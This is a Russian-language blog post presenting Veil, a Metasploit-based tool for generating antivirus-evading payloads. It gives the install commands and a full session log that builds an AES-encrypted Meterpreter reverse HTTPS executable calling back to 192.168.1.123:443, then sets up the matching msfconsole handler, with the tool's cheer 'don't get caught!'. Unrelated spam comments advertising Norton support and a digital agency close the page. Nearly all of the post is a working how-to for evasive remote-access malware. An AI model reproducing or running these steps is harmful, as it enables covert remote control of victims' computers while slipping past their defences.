Очередной "булыжник" в сторону большинства современных аверов демонстрирует сборка под названием Veil. Этот волшебный тулкит представляет из себя генератор полезной нагрузки совместимый с MSF (базируется на msfvenom). После окончательной сборки через Pyinstaller или Py2Exe полученная бинарь в настоящее время распознается только двумя антивирусными решениями (и не самыми популярными...).
Установка и использование
"- Kali
- Backtrack
- Kali
- Backtrack
- Okay, take both" (c) anonymous
# git clone https://github.com/ChrisTruncer/Veil.git
# cd Veil/setup
# ./setup.sh
...
# ./Veil.py
=========================================================================
Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================
[?] What payload type would you like to use?
1 - Meterpreter - Python - void pointer
2 - Meterpreter - Python - VirtualAlloc()
3 - Meterpreter - Python - base64 Encoded
4 - Meterpreter - Python - Letter Substitution
5 - Meterpreter - Python - ARC4 Stream Cipher
6 - Meterpreter - Python - DES Encrypted
7 - Meterpreter - Python - AES Encrypted
8 - Meterpreter - C - void pointer
9 - Meterpreter - C - VirtualAlloc()
0 - Exit Veil
[>] Please enter the number of your choice: 7
=========================================================================
Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================
[?] Use msfvenom or supply custom shellcode?
1 - msfvenom (default)
2 - Custom
[>] Please enter the number of your choice: 1
=========================================================================
Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================
[?] What type of payload would you like?
1 - Reverse TCP
2 - Reverse HTTP
3 - Reverse HTTPS
0 - Main Menu
[>] Please enter the number of your choice: 3
[?] What's the Local Host IP Address: 192.168.1.123
[?] What's the Local Port Number: 443
[*] Generating shellcode...
=========================================================================
Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================
[?] How would you like to create your payload executable?
1 - Pyinstaller (default)
2 - Py2Exe
[>] Please enter the number of your choice: 1
55 INFO: wrote Z:\root\v\Veil\payload.spec
...
8134 INFO: Appending archive to EXE Z:\root\v\Veil\dist\payload.exe
=========================================================================
Veil | [Version]: 1.1.0 | [Updated]: 06.01.2013
=========================================================================
[!] Be sure to set up a Reverse HTTPS handler with the following settings:
PAYLOAD = windows/meterpreter/reverse_https
LHOST = 192.168.1.123
LPORT = 443
[!] Your payload files have been generated, don't get caught!
# file payload.exe
payload.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
...
# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.1.123
LHOST => 192.168.1.123
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Started HTTPS reverse handler on https://192.168.1.123:443/
[*] Starting the payload handler...
we know today: real-time, on-demand protection against the latest online threats with the help of Norton technical support UK.
ОтветитьУдалитьIt Info Technologies Pvt Ltd is a full-service digital agency with skills in e-learning, mobile & digital marketing, new media, and site design & development. Through our incredibly innovative ideas, technologically advanced solutions, and goal-oriented tactics, we significantly increase the value addition to the businesses of our clients.
ОтветитьУдалить